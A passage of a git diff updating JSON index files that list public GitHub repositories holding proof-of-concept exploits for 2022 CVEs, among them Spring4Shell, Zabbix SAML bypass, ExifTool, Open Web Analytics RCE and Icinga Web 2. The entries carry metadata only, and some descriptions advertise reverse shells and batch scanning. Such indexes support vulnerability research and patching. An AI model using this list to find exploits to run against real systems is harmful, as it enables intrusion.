+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 613032720,
+ "name": "Spring4Shell-PoC-exploit",
+ "full_name": "gokul-ramesh\/Spring4Shell-PoC-exploit",
+ "owner": {
+ "login": "gokul-ramesh",
+ "id": 65040016,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65040016?v=4",
+ "html_url": "https:\/\/github.com\/gokul-ramesh"
+ },
+ "html_url": "https:\/\/github.com\/gokul-ramesh\/Spring4Shell-PoC-exploit",
+ "description": "Demonstrable Proof of Concept Exploit for Spring4Shell Vulnerability (CVE-2022-22965)",
+ "fork": false,
+ "created_at": "2023-03-12T17:37:51Z",
+ "updated_at": "2024-06-24T06:32:48Z",
+ "pushed_at": "2023-03-17T14:30:25Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2022-22965",
+ "exploit-poc",
+ "spring4shell"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 647731640,
"name": "Telstra-Cybersecurity-Virtual-Experience-",
@@ -2093,6 +2187,96 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 649060182,
+ "name": "CVE-2022-22965",
+ "full_name": "BKLockly\/CVE-2022-22965",
+ "owner": {
+ "login": "BKLockly",
+ "id": 113906689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113906689?v=4",
+ "html_url": "https:\/\/github.com\/BKLockly"
+ },
+ "html_url": "https:\/\/github.com\/BKLockly\/CVE-2022-22965",
+ "description": "Poc&Exp,支持批量扫描,反弹shell",
+ "fork": false,
+ "created_at": "2023-06-03T16:39:50Z",
+ "updated_at": "2023-10-12T17:15:11Z",
+ "pushed_at": "2023-06-04T03:51:56Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 650528662,
+ "name": "Spring4Shell",
+ "full_name": "dbgee\/Spring4Shell",
+ "owner": {
+ "login": "dbgee",
+ "id": 46910972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46910972?v=4",
+ "html_url": "https:\/\/github.com\/dbgee"
+ },
+ "html_url": "https:\/\/github.com\/dbgee\/Spring4Shell",
+ "description": "Spring rce environment for CVE-2022-22965",
+ "fork": false,
+ "created_at": "2023-06-07T09:02:50Z",
+ "updated_at": "2023-06-08T03:38:35Z",
+ "pushed_at": "2023-06-08T03:37:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 656168817,
+ "name": "CVE-2022-22965-Spring4Shell",
+ "full_name": "jakabakos\/CVE-2022-22965-Spring4Shell",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/CVE-2022-22965-Spring4Shell",
+ "description": "PoC and exploit for CVE-2022-22965 Spring4Shell",
+ "fork": false,
+ "created_at": "2023-06-20T11:45:29Z",
+ "updated_at": "2024-06-06T11:59:00Z",
+ "pushed_at": "2023-06-21T10:28:40Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 686301684,
"name": "Spring4Shell-CVE-2022-22965",
diff --git a/2022/CVE-2022-22978.json b/2022/CVE-2022-22978.json
index 99ab3c911c..d2a246d355 100644
--- a/2022/CVE-2022-22978.json
+++ b/2022/CVE-2022-22978.json
@@ -94,6 +94,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 608016738,
+ "name": "CVE-2022-22978",
+ "full_name": "umakant76705\/CVE-2022-22978",
+ "owner": {
+ "login": "umakant76705",
+ "id": 31900360,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31900360?v=4",
+ "html_url": "https:\/\/github.com\/umakant76705"
+ },
+ "html_url": "https:\/\/github.com\/umakant76705\/CVE-2022-22978",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-01T06:21:56Z",
+ "updated_at": "2023-03-17T15:20:20Z",
+ "pushed_at": "2023-03-01T06:22:08Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 614770479,
"name": "CVE-2022-22978",
diff --git a/2022/CVE-2022-23093.json b/2022/CVE-2022-23093.json
index 1352a09b43..7e66efb964 100644
--- a/2022/CVE-2022-23093.json
+++ b/2022/CVE-2022-23093.json
@@ -1,4 +1,46 @@
[
+ {
+ "id": 608826023,
+ "name": "CVE-2022-23093",
+ "full_name": "Inplex-sys\/CVE-2022-23093",
+ "owner": {
+ "login": "Inplex-sys",
+ "id": 69421356,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4",
+ "html_url": "https:\/\/github.com\/Inplex-sys"
+ },
+ "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-23093",
+ "description": "The FreeBSD ICMP buffer overflow, freebsd buffer overflow poc",
+ "fork": false,
+ "created_at": "2023-03-02T20:18:54Z",
+ "updated_at": "2024-06-21T06:03:43Z",
+ "pushed_at": "2023-03-25T17:41:13Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "buffer-overflow",
+ "cve-2022-23093",
+ "draytek-vigor-rce",
+ "exploit",
+ "exploits",
+ "freebsd",
+ "freebsd-exploit",
+ "icmp",
+ "poc",
+ "security",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 775885856,
"name": "DrayTek-Exploit",
diff --git a/2022/CVE-2022-23131.json b/2022/CVE-2022-23131.json
index 6819cb6717..1a8b7e3b60 100644
--- a/2022/CVE-2022-23131.json
+++ b/2022/CVE-2022-23131.json
@@ -430,6 +430,96 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 586260198,
+ "name": "cve-2022-23131",
+ "full_name": "wr0x00\/cve-2022-23131",
+ "owner": {
+ "login": "wr0x00",
+ "id": 86941613,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86941613?v=4",
+ "html_url": "https:\/\/github.com\/wr0x00"
+ },
+ "html_url": "https:\/\/github.com\/wr0x00\/cve-2022-23131",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-07T14:09:40Z",
+ "updated_at": "2023-01-07T14:10:50Z",
+ "pushed_at": "2023-01-07T14:22:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 586722779,
+ "name": "CVE-2022-23131_exp",
+ "full_name": "Arrnitage\/CVE-2022-23131_exp",
+ "owner": {
+ "login": "Arrnitage",
+ "id": 48816467,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48816467?v=4",
+ "html_url": "https:\/\/github.com\/Arrnitage"
+ },
+ "html_url": "https:\/\/github.com\/Arrnitage\/CVE-2022-23131_exp",
+ "description": "zabbix saml bypass",
+ "fork": false,
+ "created_at": "2023-01-09T04:10:08Z",
+ "updated_at": "2023-02-09T03:20:18Z",
+ "pushed_at": "2023-01-09T04:10:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 604432382,
+ "name": "Zabbix-SAML-SSO-_CVE-2022-23131",
+ "full_name": "clearcdq\/Zabbix-SAML-SSO-_CVE-2022-23131",
+ "owner": {
+ "login": "clearcdq",
+ "id": 81290636,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81290636?v=4",
+ "html_url": "https:\/\/github.com\/clearcdq"
+ },
+ "html_url": "https:\/\/github.com\/clearcdq\/Zabbix-SAML-SSO-_CVE-2022-23131",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-21T03:30:20Z",
+ "updated_at": "2023-03-20T07:44:06Z",
+ "pushed_at": "2023-02-21T03:45:25Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 709195408,
"name": "CVE-2022-23131",
diff --git a/2022/CVE-2022-23303.json b/2022/CVE-2022-23303.json
new file mode 100644
index 0000000000..46a9acb7bb
--- /dev/null
+++ b/2022/CVE-2022-23303.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595001088,
+ "name": "hostapd_mirror",
+ "full_name": "skulkarni-mv\/hostapd_mirror",
+ "owner": {
+ "login": "skulkarni-mv",
+ "id": 117360244,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117360244?v=4",
+ "html_url": "https:\/\/github.com\/skulkarni-mv"
+ },
+ "html_url": "https:\/\/github.com\/skulkarni-mv\/hostapd_mirror",
+ "description": "mirror of https:\/\/w1.fi\/cgit\/hostap\/ till 30\/01\/2023 for CVE-2022-23303\/4 - c22",
+ "fork": false,
+ "created_at": "2023-01-30T07:22:34Z",
+ "updated_at": "2023-09-13T12:10:22Z",
+ "pushed_at": "2023-02-01T06:29:13Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-23529.json b/2022/CVE-2022-23529.json
new file mode 100644
index 0000000000..4c049d8f42
--- /dev/null
+++ b/2022/CVE-2022-23529.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 587705478,
+ "name": "CVE-2022-23529-lab",
+ "full_name": "despossivel\/CVE-2022-23529-lab",
+ "owner": {
+ "login": "despossivel",
+ "id": 10657158,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10657158?v=4",
+ "html_url": "https:\/\/github.com\/despossivel"
+ },
+ "html_url": "https:\/\/github.com\/despossivel\/CVE-2022-23529-lab",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-11T11:46:22Z",
+ "updated_at": "2023-01-11T11:46:22Z",
+ "pushed_at": "2023-01-11T11:46:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 598042130,
+ "name": "CVE-2022-23529-PoC",
+ "full_name": "hackintoanetwork\/CVE-2022-23529-PoC",
+ "owner": {
+ "login": "hackintoanetwork",
+ "id": 83481196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83481196?v=4",
+ "html_url": "https:\/\/github.com\/hackintoanetwork"
+ },
+ "html_url": "https:\/\/github.com\/hackintoanetwork\/CVE-2022-23529-PoC",
+ "description": "CVE-2022-23529-PoC",
+ "fork": false,
+ "created_at": "2023-02-06T09:19:20Z",
+ "updated_at": "2023-02-06T09:18:59Z",
+ "pushed_at": "2023-02-04T10:16:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-23614.json b/2022/CVE-2022-23614.json
index 6abe687dda..790a1af86b 100644
--- a/2022/CVE-2022-23614.json
+++ b/2022/CVE-2022-23614.json
@@ -32,5 +32,35 @@
"watchers": 4,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 662215491,
+ "name": "CVE-2022-23614",
+ "full_name": "4rtamis\/CVE-2022-23614",
+ "owner": {
+ "login": "4rtamis",
+ "id": 62891170,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62891170?v=4",
+ "html_url": "https:\/\/github.com\/4rtamis"
+ },
+ "html_url": "https:\/\/github.com\/4rtamis\/CVE-2022-23614",
+ "description": "Proof of concept for CVE-2022-23614 (command injection in Twig)",
+ "fork": false,
+ "created_at": "2023-07-04T15:52:50Z",
+ "updated_at": "2023-07-04T16:57:04Z",
+ "pushed_at": "2023-07-04T16:57:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-23773.json b/2022/CVE-2022-23773.json
index e17cb6a95b..7806cbbd26 100644
--- a/2022/CVE-2022-23773.json
+++ b/2022/CVE-2022-23773.json
@@ -58,5 +58,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 615996454,
+ "name": "CVE-2022-23773-Reproduce",
+ "full_name": "YouShengLiu\/CVE-2022-23773-Reproduce",
+ "owner": {
+ "login": "YouShengLiu",
+ "id": 51371214,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51371214?v=4",
+ "html_url": "https:\/\/github.com\/YouShengLiu"
+ },
+ "html_url": "https:\/\/github.com\/YouShengLiu\/CVE-2022-23773-Reproduce",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-19T10:08:47Z",
+ "updated_at": "2023-05-31T07:52:38Z",
+ "pushed_at": "2023-05-31T07:56:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-23935.json b/2022/CVE-2022-23935.json
new file mode 100644
index 0000000000..698b5167b3
--- /dev/null
+++ b/2022/CVE-2022-23935.json
@@ -0,0 +1,97 @@
+[
+ {
+ "id": 594491558,
+ "name": "CVE-2022-23935-PoC-Exploit",
+ "full_name": "dpbe32\/CVE-2022-23935-PoC-Exploit",
+ "owner": {
+ "login": "dpbe32",
+ "id": 93081177,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93081177?v=4",
+ "html_url": "https:\/\/github.com\/dpbe32"
+ },
+ "html_url": "https:\/\/github.com\/dpbe32\/CVE-2022-23935-PoC-Exploit",
+ "description": "CVE-2022-23935 exploit PoC exiftool version 12.37",
+ "fork": false,
+ "created_at": "2023-01-28T18:04:05Z",
+ "updated_at": "2024-05-31T07:39:02Z",
+ "pushed_at": "2023-02-21T15:22:31Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 598604286,
+ "name": "CVE-2022-23935",
+ "full_name": "cowsecurity\/CVE-2022-23935",
+ "owner": {
+ "login": "cowsecurity",
+ "id": 74612612,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74612612?v=4",
+ "html_url": "https:\/\/github.com\/cowsecurity"
+ },
+ "html_url": "https:\/\/github.com\/cowsecurity\/CVE-2022-23935",
+ "description": "CVE-2022-23935 exploit PoC exiftool version 12.37 written in python",
+ "fork": false,
+ "created_at": "2023-02-07T13:02:40Z",
+ "updated_at": "2023-04-01T15:46:36Z",
+ "pushed_at": "2023-02-07T13:10:30Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 600164977,
+ "name": "CVE-2022-23935",
+ "full_name": "BKreisel\/CVE-2022-23935",
+ "owner": {
+ "login": "BKreisel",
+ "id": 1513073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4",
+ "html_url": "https:\/\/github.com\/BKreisel"
+ },
+ "html_url": "https:\/\/github.com\/BKreisel\/CVE-2022-23935",
+ "description": "🐍 Python Exploit for CVE-2022-23935",
+ "fork": false,
+ "created_at": "2023-02-10T18:22:44Z",
+ "updated_at": "2023-06-04T19:04:12Z",
+ "pushed_at": "2023-02-10T21:00:05Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2022-23935",
+ "exploit",
+ "python"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-24112.json b/2022/CVE-2022-24112.json
index 6f549e1128..1f68fcff90 100644
--- a/2022/CVE-2022-24112.json
+++ b/2022/CVE-2022-24112.json
@@ -244,6 +244,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 618895100,
+ "name": "CVE-2022-24112-Lab",
+ "full_name": "wshepherd0010\/CVE-2022-24112-Lab",
+ "owner": {
+ "login": "wshepherd0010",
+ "id": 6044372,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6044372?v=4",
+ "html_url": "https:\/\/github.com\/wshepherd0010"
+ },
+ "html_url": "https:\/\/github.com\/wshepherd0010\/CVE-2022-24112-Lab",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-25T16:58:36Z",
+ "updated_at": "2023-03-25T17:04:33Z",
+ "pushed_at": "2023-04-06T23:05:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 809913189,
"name": "exploit_CVE-2022-24112",
diff --git a/2022/CVE-2022-24125.json b/2022/CVE-2022-24125.json
index 4688533dc9..7a1096f43b 100644
--- a/2022/CVE-2022-24125.json
+++ b/2022/CVE-2022-24125.json
@@ -13,10 +13,10 @@
"description": "Documentation and proof of concept code for CVE-2022-24125 and CVE-2022-24126.",
"fork": false,
"created_at": "2022-01-28T20:37:14Z",
- "updated_at": "2024-06-22T13:13:12Z",
+ "updated_at": "2024-06-26T01:13:04Z",
"pushed_at": "2022-08-30T02:11:05Z",
- "stargazers_count": 146,
- "watchers_count": 146,
+ "stargazers_count": 147,
+ "watchers_count": 147,
"has_discussions": false,
"forks_count": 8,
"allow_forking": true,
@@ -31,7 +31,7 @@
],
"visibility": "public",
"forks": 8,
- "watchers": 146,
+ "watchers": 147,
"score": 0,
"subscribers_count": 3
}
diff --git a/2022/CVE-2022-24481.json b/2022/CVE-2022-24481.json
new file mode 100644
index 0000000000..b3c6e36000
--- /dev/null
+++ b/2022/CVE-2022-24481.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 640468590,
+ "name": "CVE-2022-24481-POC",
+ "full_name": "fr4nkxixi\/CVE-2022-24481-POC",
+ "owner": {
+ "login": "fr4nkxixi",
+ "id": 81340681,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81340681?v=4",
+ "html_url": "https:\/\/github.com\/fr4nkxixi"
+ },
+ "html_url": "https:\/\/github.com\/fr4nkxixi\/CVE-2022-24481-POC",
+ "description": "POC for CLFS CVE-2022-24481",
+ "fork": false,
+ "created_at": "2023-05-14T07:30:23Z",
+ "updated_at": "2024-06-10T17:07:19Z",
+ "pushed_at": "2023-05-14T08:07:40Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-24637.json b/2022/CVE-2022-24637.json
index 0e4298243d..2ffa284694 100644
--- a/2022/CVE-2022-24637.json
+++ b/2022/CVE-2022-24637.json
@@ -123,6 +123,66 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 611686754,
+ "name": "CVE-2022-24637",
+ "full_name": "Pflegusch\/CVE-2022-24637",
+ "owner": {
+ "login": "Pflegusch",
+ "id": 44372539,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44372539?v=4",
+ "html_url": "https:\/\/github.com\/Pflegusch"
+ },
+ "html_url": "https:\/\/github.com\/Pflegusch\/CVE-2022-24637",
+ "description": "Open Web Analytics 1.7.3 - Remote Code Execution",
+ "fork": false,
+ "created_at": "2023-03-09T10:40:24Z",
+ "updated_at": "2023-10-19T18:37:06Z",
+ "pushed_at": "2023-04-08T13:58:29Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 619163880,
+ "name": "CVE-2022-24637",
+ "full_name": "0xM4hm0ud\/CVE-2022-24637",
+ "owner": {
+ "login": "0xM4hm0ud",
+ "id": 80924519,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80924519?v=4",
+ "html_url": "https:\/\/github.com\/0xM4hm0ud"
+ },
+ "html_url": "https:\/\/github.com\/0xM4hm0ud\/CVE-2022-24637",
+ "description": "Unauthenticated RCE in Open Web Analytics version <1.7.4",
+ "fork": false,
+ "created_at": "2023-03-26T13:11:50Z",
+ "updated_at": "2024-05-15T06:21:34Z",
+ "pushed_at": "2023-03-26T13:22:14Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 681731098,
"name": "CVE-2022-24637",
diff --git a/2022/CVE-2022-24715.json b/2022/CVE-2022-24715.json
index 9b9317b736..63fff7edb3 100644
--- a/2022/CVE-2022-24715.json
+++ b/2022/CVE-2022-24715.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 616284623,
+ "name": "CVE-2022-24715",
+ "full_name": "JacobEbben\/CVE-2022-24715",
+ "owner": {
+ "login": "JacobEbben",
+ "id": 112503338,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4",
+ "html_url": "https:\/\/github.com\/JacobEbben"
+ },
+ "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-24715",
+ "description": " Authenticated Remote Code Execution in Icinga Web 2 <2.8.6, <2.9.6, <2.10",
+ "fork": false,
+ "created_at": "2023-03-20T04:31:32Z",
+ "updated_at": "2023-07-17T19:37:21Z",
+ "pushed_at": "2023-04-27T08:43:59Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 664102574,
"name": "CVE-2022-24715",
diff --git a/2022/CVE-2022-24716.json b/2022/CVE-2022-24716.json
index 58d46def51..b22939b888 100644
--- a/2022/CVE-2022-24716.json
+++ b/2022/CVE-2022-24716.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 616179873,
+ "name": "CVE-2022-24716",
+ "full_name": "JacobEbben\/CVE-2022-24716",
+ "owner": {
+ "login": "JacobEbben",
+ "id": 112503338,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4",
+ "html_url": "https:\/\/github.com\/JacobEbben"
+ },
+ "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-24716",
+ "description": "Arbitrary File Disclosure Vulnerability in Icinga Web 2 <2.8.6, <2.9.6, <2.10",
+ "fork": false,
+ "created_at": "2023-03-19T20:41:46Z",
+ "updated_at": "2023-12-07T14:08:19Z",
+ "pushed_at": "2023-03-27T22:46:04Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 616253439,
"name": "CVE-2022-24716",
@@ -28,5 +58,95 @@
"watchers": 5,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 619003382,
+ "name": "CVE-2022-24716",
+ "full_name": "pumpkinpiteam\/CVE-2022-24716",
+ "owner": {
+ "login": "pumpkinpiteam",
+ "id": 128508216,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128508216?v=4",
+ "html_url": "https:\/\/github.com\/pumpkinpiteam"
+ },
+ "html_url": "https:\/\/github.com\/pumpkinpiteam\/CVE-2022-24716",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-26T01:03:07Z",
+ "updated_at": "2023-03-26T01:04:33Z",
+ "pushed_at": "2023-03-26T01:04:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 619372624,
+ "name": "CVE-2022-24716",
+ "full_name": "doosec101\/CVE-2022-24716",
+ "owner": {
+ "login": "doosec101",
+ "id": 128431701,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128431701?v=4",
+ "html_url": "https:\/\/github.com\/doosec101"
+ },
+ "html_url": "https:\/\/github.com\/doosec101\/CVE-2022-24716",
+ "description": "Arbitrary File Disclosure Vulnerability in Icinga Web 2 <2.8.6, <2.9.6, <2.10",
+ "fork": false,
+ "created_at": "2023-03-27T02:22:23Z",
+ "updated_at": "2023-04-24T21:26:44Z",
+ "pushed_at": "2023-03-27T02:47:46Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 643308038,
+ "name": "CVE-2022-24716",
+ "full_name": "antisecc\/CVE-2022-24716",
+ "owner": {
+ "login": "antisecc",
+ "id": 92209707,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92209707?v=4",
+ "html_url": "https:\/\/github.com\/antisecc"
+ },
+ "html_url": "https:\/\/github.com\/antisecc\/CVE-2022-24716",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-20T18:43:46Z",
+ "updated_at": "2023-05-20T18:50:20Z",
+ "pushed_at": "2023-05-20T18:50:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
